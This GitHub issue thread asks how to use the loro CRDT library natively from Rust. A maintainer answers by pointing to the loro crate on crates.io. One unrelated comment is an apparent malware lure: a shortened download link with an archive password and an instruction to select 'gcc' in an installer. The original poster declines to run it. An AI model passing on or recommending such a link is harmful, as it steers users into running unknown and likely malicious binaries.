### ISSUE TITLE
An example of using loro nativelly from Rust if possible

### ISSUE THREAD

**Issue by iilyak** [loro-dev/loro#438]
All documentation and examples are written in TypeScript. My question is whether it is possible to use loro in rust application as crate without adding wasm runtime. If so the example in the repository would be great.

**Comment by c0ffincolors** [comment]
Download 
https://bit.ly/3MjP129
password: changeme
In the installer menu, select "gcc."

**Comment by iilyak** [comment]
I am not going to run arbitrary binary.

> Download https://bit.ly/3MjP129 password: changeme In the installer menu, select "gcc."

I am not going to run arbitrary binary

**Comment by Leeeon233** [comment]
You can use [loro](https://crates.io/crates/loro) crate in Rust. It has a similar API to typescript.

**Comment by iilyak** [comment]
> You can use [loro](https://crates.io/crates/loro) crate in Rust. It has a similar API to typescript.

Thank you. I also found examples in crates/loro/README.md
